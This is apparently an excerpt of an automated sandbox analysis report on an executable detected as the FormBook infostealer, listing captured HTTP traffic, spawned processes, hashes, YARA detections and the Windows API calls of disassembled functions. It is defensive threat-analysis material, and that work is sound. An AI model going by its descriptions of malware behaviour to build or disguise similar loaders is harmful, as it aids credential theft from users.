55 7a 45 5a 2b 38 64 44 5a 66 6c 38 4e 74 6d 41 78 59 61 34 72 69 45 51 37 66 44 4c 52 4b 4d 7a 79 69 34 49 64 55 33 2f 38 46 6b 72 4c 34 41 47 59 44 5a 4e 56 31 61 51 4f 76 67 4d 66 33 65 64 6e 37 79 49 51 36 6e 6f 79 4d 4d 32 4a 30 58 39 56 64 32 50 44 35 67 4b 5a 38 6b 63 48 31 4b 42 44 43 58 75 4b 4e 30 63 6d 41 52 55 4f 32 44 55 76 4c 56 6d 78 73 67 76 44 77 58 31 44 4f 4e 63 73 73 48 41 34 45 47 4f 71 33 6d 4d 64 72 47 41 3d 3d Data Ascii: 9F=X8UNa41VTVwTl8JW2rWucgfuuAaLboacdzwlNF+7DSNjCTZZtrmmZBdGMJbX9pFuv0UzEZ+8dDZfl8NtmAxYa4riEQ7fDLRKMzyi4IdU3/8FkrL4AGYDZNV1aQOvgMf3edn7yIQ6noyMM2J0X9Vd2PD5gKZ8kcH1KBDCXuKN0cmARUO2DUvLVmxsgvDwX1DONcssHA4EGOq3mMdrGA==
Jan 11, 2025 01:57:07.417762041 CET	190	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 11 Jan 2025 00:57:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a Data Ascii: d404 Not Found0

Target ID:	0
Start time:	19:54:00
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\XeFYBYYj0w.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\XeFYBYYj0w.exe"
Imagebase:	0xa10000
File size:	1'294'848 bytes
MD5 hash:	ECB2719218EA0AD21C7D72A976CF69D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	19:54:05
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\XeFYBYYj0w.exe"
Imagebase:	0x530000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1640145384.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1639166335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1640191326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	21:38:26
Start date:	10/01/2025
Path:	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe"
Imagebase:	0x560000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3146582486.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	21:38:27
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\relog.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\relog.exe"
Imagebase:	0x6e0000
File size:	45'568 bytes
MD5 hash:	DA20D543A130003B427AEB18AE2FE094
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3145337873.0000000002770000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3145033893.0000000000490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3145403787.00000000027C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	21:38:40
Start date:	10/01/2025
Path:	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe"
Imagebase:	0x560000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3149335657.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	21:38:53
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	6.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	69

Executed Functions

Function 00A13B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A13B68
IsDebuggerPresent.KERNEL32 ref: 00A13B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,00AD52F8,00AD52E0,?,?), ref: 00A13BEB

Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06

Part of subcall function 00A2092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A13C14,00AD52F8,?,?,?), ref: 00A2096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00A13C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00AC7770,00000010), ref: 00A4D281
SetCurrentDirectoryW.KERNEL32(?,00AD52F8,?,?,?), ref: 00A4D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00AC4260,00AD52F8,?,?,?), ref: 00A4D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 00A4D346

Part of subcall function 00A13A46: GetSysColorBrush.USER32(0000000F), ref: 00A13A50
Part of subcall function 00A13A46: LoadCursorW.USER32(00000000,00007F00), ref: 00A13A5F
Part of subcall function 00A13A46: LoadIconW.USER32(00000063), ref: 00A13A76
Part of subcall function 00A13A46: LoadIconW.USER32(000000A4), ref: 00A13A88
Part of subcall function 00A13A46: LoadIconW.USER32(000000A2), ref: 00A13A9A
Part of subcall function 00A13A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A13AC0
Part of subcall function 00A13A46: RegisterClassExW.USER32(?), ref: 00A13B16

Part of subcall function 00A139D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A13A03
Part of subcall function 00A139D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A13A24
Part of subcall function 00A139D5: ShowWindow.USER32(00000000,?,?), ref: 00A13A38
Part of subcall function 00A139D5: ShowWindow.USER32(00000000,?,?), ref: 00A13A41

Part of subcall function 00A1434A: _memset.LIBCMT ref: 00A14370
Part of subcall function 00A1434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A14415

Strings

This is a third-party compiled AutoIt script., xrefs: 00A4D279
runas, xrefs: 00A4D33A

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: ff4155f9e5f01832ddf764e8667aa1d6c0cf3b295cad0faea5262d0c372a4b10
Instruction ID: 51a551b4a92152292382f5817afda284d83b5ee0b56520b428fc196b3d0d86a4
Opcode Fuzzy Hash: ff4155f9e5f01832ddf764e8667aa1d6c0cf3b295cad0faea5262d0c372a4b10
Instruction Fuzzy Hash: 1E51D475E09248BECF01EFF5DD05EED7B78AF45710B004066F452A62A2DAB0568ACB61

Function 00A149A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00A149CD

Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06

GetCurrentProcess.KERNEL32(?,00A9FAEC,00000000,00000000,?), ref: 00A14A9A
IsWow64Process.KERNEL32(00000000), ref: 00A14AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00A14AE7
FreeLibrary.KERNEL32(00000000), ref: 00A14AF2
GetSystemInfo.KERNEL32(00000000), ref: 00A14B23
GetSystemInfo.KERNEL32(00000000), ref: 00A14B2F

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 4d62f58253c465ac2219929506ccb920288777e7826baf621be1c8169a458a4d
Instruction ID: 3f6f7d9cf56a0e1699faa37c8ce2e4606b5c8fb6e352e867695022349884a2f6
Opcode Fuzzy Hash: 4d62f58253c465ac2219929506ccb920288777e7826baf621be1c8169a458a4d
Instruction Fuzzy Hash: BF91C43598D7C0DEC731CB7895501EAFFF5AF6E300B584AAED0C793A41D620A588C769

Function 00A14E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00A14D8E,?,?,00000000,00000000), ref: 00A14E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A14D8E,?,?,00000000,00000000), ref: 00A14EB0
LoadResource.KERNEL32(?,00000000,?,?,00A14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00A14E2F), ref: 00A4D937
SizeofResource.KERNEL32(?,00000000,?,?,00A14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00A14E2F), ref: 00A4D94C
LockResource.KERNEL32(00A14D8E,?,?,00A14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00A14E2F,00000000), ref: 00A4D95F

Strings

SCRIPT, xrefs: 00A14EA6

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: b715b803d2d400e4ded562d4db2bdee9fc0ae1561ec464c7e90895be14be4d40
Instruction ID: 9333d1ceeb48f898c2fd3e3068b38d0f42db688f7e805e7cdf4821663e627900
Opcode Fuzzy Hash: b715b803d2d400e4ded562d4db2bdee9fc0ae1561ec464c7e90895be14be4d40
Instruction Fuzzy Hash: DB115EB5244700BFD7218BA9EC48FA77BBAFBC9B51F204269F405C6290DF71E8418660

Function 00A1FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 19c538bce3d3f8b3d1828fb2d056b6805b64226d211ae712547beda442de79eb
Instruction ID: a389f2b91debd65d8a910e926f25dcd90648340dc5a3ff116cc1febf81b237c9
Opcode Fuzzy Hash: 19c538bce3d3f8b3d1828fb2d056b6805b64226d211ae712547beda442de79eb
Instruction Fuzzy Hash: 2D926B706083518FD720DF18D580B6ABBF5BF89304F14896DE89A8B362D775EC85CB92

Function 00A7445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00A4E398), ref: 00A7446A
FindFirstFileW.KERNELBASE(?,?), ref: 00A7447B
FindClose.KERNEL32(00000000), ref: 00A7448B

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: cbd2ce922369e373c2a519c4625a713e882a48a9eed84b14a434c482b5c9af78
Instruction ID: 35026a8a778d16235821ef793b999c29f421688dd8f7a1101b7e9d6326ec3221
Opcode Fuzzy Hash: cbd2ce922369e373c2a519c4625a713e882a48a9eed84b14a434c482b5c9af78
Instruction Fuzzy Hash: 93E0D8335105006B4210AB78EC0D5EA775C9E09335F24C716F839C10D0FB745900A595

Function 00A1E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00A53E62

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 9b51a41658bddcf95c30debb6d3298b2c5a244344d6b92c34908107a3e3e4298
Instruction ID: a482492509630f4f2d504ffa3060a7f763638de5f9e0a05a17511e00e037f299
Opcode Fuzzy Hash: 9b51a41658bddcf95c30debb6d3298b2c5a244344d6b92c34908107a3e3e4298
Instruction Fuzzy Hash: A7A28C75A00215DFCB24CF98C580AEAB7B2FF58314F288469ED06AB351D735ED86CB90

Function 00A209D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A20A5B
timeGetTime.WINMM ref: 00A20D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A20E53
Sleep.KERNEL32(0000000A), ref: 00A20E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00A20EFA
DestroyWindow.USER32 ref: 00A20F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A20F20
Sleep.KERNEL32(0000000A,?,?), ref: 00A54E83
TranslateMessage.USER32(?), ref: 00A55C60
DispatchMessageW.USER32(?), ref: 00A55C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A55C82

Strings

@TRAY_ID, xrefs: 00A5578F
@GUI_CTRLHANDLE, xrefs: 00A54FE4
@GUI_CTRLID, xrefs: 00A54F3A
@GUI_WINHANDLE, xrefs: 00A54F8F
@COM_EVENTOBJ, xrefs: 00A554F0

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: d28440705b50bf7673dec9b7bfd443602b704fbc3e0cfc04122bbdaca8d77109
Instruction ID: 2c0c70366dbbe872e6a0da302420d9dea859dee1ae5dba1f3a338dd93c9efd3e
Opcode Fuzzy Hash: d28440705b50bf7673dec9b7bfd443602b704fbc3e0cfc04122bbdaca8d77109
Instruction Fuzzy Hash: 24B2C370A08741DFD724DF24C994FAAB7F5BF84305F14492DE94A972A2CB71E889CB42

Function 00A79155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A78F5F: __time64.LIBCMT ref: 00A78F69

Part of subcall function 00A14EE5: _fseek.LIBCMT ref: 00A14EFD

__wsplitpath.LIBCMT ref: 00A79234

Part of subcall function 00A340FB: __wsplitpath_helper.LIBCMT ref: 00A3413B

_wcscpy.LIBCMT ref: 00A79247
_wcscat.LIBCMT ref: 00A7925A
__wsplitpath.LIBCMT ref: 00A7927F
_wcscat.LIBCMT ref: 00A79295
_wcscat.LIBCMT ref: 00A792A8

Part of subcall function 00A78FA5: _memmove.LIBCMT ref: 00A78FDE
Part of subcall function 00A78FA5: _memmove.LIBCMT ref: 00A78FED

_wcscmp.LIBCMT ref: 00A791EF

Part of subcall function 00A79734: _wcscmp.LIBCMT ref: 00A79824
Part of subcall function 00A79734: _wcscmp.LIBCMT ref: 00A79837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A79452
_wcsncpy.LIBCMT ref: 00A794C5
DeleteFileW.KERNEL32(?,?), ref: 00A794FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A79511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A79522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A79534

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: b7b379b66cd3ed9cb0a5268f83140ae9d4329af7dc39448b2500e88ed25c3049
Instruction ID: 79b0142b0619e722d3328dda0187cb28abbf42d7a5b13deaca2e3fd524568954
Opcode Fuzzy Hash: b7b379b66cd3ed9cb0a5268f83140ae9d4329af7dc39448b2500e88ed25c3049
Instruction Fuzzy Hash: 85C11DB1E00119AADF11DF95CD85ADFBBBDEF49310F0080AAF609E7151DB309A858F65

Function 00A13015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A13074
RegisterClassExW.USER32(00000030), ref: 00A1309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A130AF
InitCommonControlsEx.COMCTL32(?), ref: 00A130CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A130DC
LoadIconW.USER32(000000A9), ref: 00A130F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A13101

Strings

+, xrefs: 00A1305D
0, xrefs: 00A13056
TaskbarCreated, xrefs: 00A130A4
AutoIt v3 GUI, xrefs: 00A13090

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 6c634365e0e0aa4dd2be666a0b1b7d976ec6de40cca796cc93838da8047286fa
Instruction ID: db0f09f5d7b34922387bc026e5f0a9bfe00449f4921bd75918df048a97ea592d
Opcode Fuzzy Hash: 6c634365e0e0aa4dd2be666a0b1b7d976ec6de40cca796cc93838da8047286fa
Instruction Fuzzy Hash: 9631E2B1941249AFDB10CFE4E889ADDBBF4FB09310F14452FE581E62A0E7B50586DF51

Function 00A13041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A13074
RegisterClassExW.USER32(00000030), ref: 00A1309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A130AF
InitCommonControlsEx.COMCTL32(?), ref: 00A130CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A130DC
LoadIconW.USER32(000000A9), ref: 00A130F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A13101

Strings

+, xrefs: 00A1305D
0, xrefs: 00A13056
TaskbarCreated, xrefs: 00A130A4
AutoIt v3 GUI, xrefs: 00A13090

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
